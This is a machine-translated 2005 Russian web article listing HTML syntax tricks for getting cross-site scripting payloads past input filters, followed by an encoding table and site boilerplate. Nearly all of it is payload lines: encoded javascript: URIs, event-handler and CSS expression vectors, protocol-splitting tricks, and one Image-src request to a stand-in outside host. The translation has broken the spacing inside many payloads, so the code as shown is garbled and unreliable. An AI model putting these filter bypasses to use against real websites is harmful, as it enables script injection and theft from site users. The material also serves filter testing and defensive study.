This page has been robot translated, sorry for typos if any. Original content here.

HTML syntax features

Creators: Algol , zFailure - the last changes 13.06.2005

One of the main methods of protecting sites from XSS vulnerabilities is the use of various filters on user-entered characters. This post describes HTML syntax features that allow you to bypass these filters.

It should be noted that XSS vulnerabilities are browser-dependent. All the examples below were tested in IE6. In other versions or in other browsers, examples may also not work. For example, the reverse apostrophe (`) character is an attribute delimiter only in IE. Other browsers, such as Opera, for example, do not consider this symbol to be the limiter.

  • Tag attribute delimiters.
    In addition to the space, it is allowed to use the characters: slash ( / ), tab, line break. The separator is allowed to be omitted if the previous accessory is enclosed in quotes.
     <image / src = "1.png" / alt = "Hint" / border = "0">
     <image src = "1.png" alt = "Hint" border = "0">
     <image
     src = "1.png"
     alt = "Hint"
     border = "0">
     <image src = "1.png" alt = "Hint" border = "0">
    
  • Tag attribute delimiters
    Values ​​are allowed to be quoted (double and single) also in the apostrophes, only allowed the general does not limit.
     <image src = "" alt = "My hint" border = "0">
     <image src = "" alt = 'My hint' border = "0">
     <image src = "" alt = `My tip` border =" 0 ">
     <image src = "" alt = Hint border = "0">
    
  • Character encodings
    Deciphering characters in a script occurs before it is executed:
      <img src = javascript: alert (& quot; ok & quot;)>
     <img src = javascript: alert (& # 039; ok & # 039;)>
     <img src = & # 106 & # 97 & # 118 & # 97 & # 115 & # 99 & # 114 & # 105 & # 112 & # 116 & # 58 & # 97 & # 108 & # 101 & # 114 & # 116 & # 40 & # 111 & # 111 & # 107 & # 39 & # 41>
     <a href=javascript:alert(%22ok%22)> click me </a> (only in the href attribute)
    
    
  • Limiters of character literals in scripts
     <img src = javascript: alert ('ok')>
     <img src = javascript: alert ("ok")>
     <img src = javascript: a = / ok /; alert (a.source)>
     <img src = javascript: alert (String.fromCharCode (111,107))>
    
  • Some character filtering bypass
     <img src = javascript: i = new / ** / Image (); i.src = 'http: //bla.bla'> (replace the space with / ** /)
     
  • Ways to run scripts
    Several ways to automatically run scripts:
      <script> alert ('ok') </ script>
     <script src = 1.js> </ script>
     <body onLoad = alert ('ok')>
     <meta http-equiv = Refresh content = 0; url = javascript: alert ('ok')>
     <image src = 1.png onload = alert ('ok')>
     <image src = javascript: alert ('ok')>
     <image src = "" onerror = alert ('ok')>
     <hr style = background: url (javascript: alert ('ok'))>
     <span style = top: expression (alert ('ok'))> </ span>
     <span sss = "alert (); this.sss = null" style = top: expression (eval (this.sss));> </ span> (works only once) <style type = "text / css"> @import url (javascript: alert ('ok')); </ style>
     <object classid = clsid: ae24fdae-03c6-11d1-8b76-0080c744f389> <param name = url value = javascript: alert ('ok')> </ object>
     <embed src = javascript: alert ('ok'); this.avi>
     <embed src = javascript: alert ('ok'); this.wav>
     <iframe src = javascript: alert ('ok')> (only in IE) <a href=javascript:alert(%22ok%22)> click me </a> (run only when clicking on the link) <a href = javascript: alert ('aaa' + eval ('alert (); i = 2 + 2') + 'bbb')> click me </a> (run only by clicking on the link) <br SIZE = "& {alert ('XSS')} "> (only Netscape 4.x)
    
    
  • Various script protocols, ways of writing them
      <img src = javascript: alert ()>
     <img src = vbscript: AleRt ()>
     <img src = JaVasCriPt: alert ()>
     <img src = "javascript: alert ()"> (spaces up to the word javascript)
     
     <img src = & # 106 & # 97 & # 118 & # 97 & # 115 & # 99 & # 114 & # 105 & # 112 & # 116: alert ()>
     <img src = javascript & # 9: alert ()>
     <img src = javascript & # 10: alert ()>
     <img src = javascript & # 13: alert ()>
     <img src = "javascript
     : alert () "> (before the colon - tab character)
     
     <img src = "java
     scri
     pt: ale
     rt () "> (inside the word javascript - the tab character is also a carriage return)
     
    
  • Insert scripts in style
    Script operators in the style attribute must be divided " \; ".
     <hr style = `background: url (javascript: alert ('ok 1') \; alert ('ok 2'))`>
    
  • Special tags.
      <image src = "1.png" alt = "" border = "0"> (the img tag also has the same image) <plaintext> (everything that moves after this tag will be perceived as plain text - not HTML) <textarea> (everything that starts moving after this tag will be perceived as plain text - not HTML at all) <xml> (everything that starts moving after this tag will not be displayed)
    
    
  • Table of frequently used codes:

    Symbol Decimal coding 16th encoding * Character encoding URL encoding
    " & # 34 & # x22; & quot % 22
    ' & # 39 & # x27; % 27
    ` & # 96 & # x60; % 60
    <space> & # 32 & # x20; +
    <tab> &#9 & # x09; % 09
    <carriage return> &#13 & # x0D; % 0D
    = & # 61 & # x3D; % 3D
    < & # 60 & # x3C; & lt % 3C
    > & # 62 & # x3E; & gt % 3E
    \ & # 92 & # x5C; % 5C
    % & # 37 & # x25; % 25
    + & # 43 & # x2B; % 2B
    <short hyphen> & # 173 & # xAD; & shy % AD
    & & # 38 & # x26; & amp % 26

    * -in some cases, the semicolon can be omitted (if the character is at the end of the line, or several characters in this encoding are in a row).

    See related: http://ha.ckers.org/xss.html
  • It will not be superfluous for your friends to find out this information, share the article with them!

    Expand / collapse Expand / Minimize Comments Window

    Comments

    Commenting, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance towards your interlocutors even if you do not share their opinion, your behavior in conditions of freedom of expression and anonymity provided by the Internet changes not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.
    Now everyone can publish articles.
    Try it first!
    Liked? Subscribe to RSS feeds,
    to be the first to receive information
    about all the important events of the country and the world.
    You can also support shram.kiev.ua, click: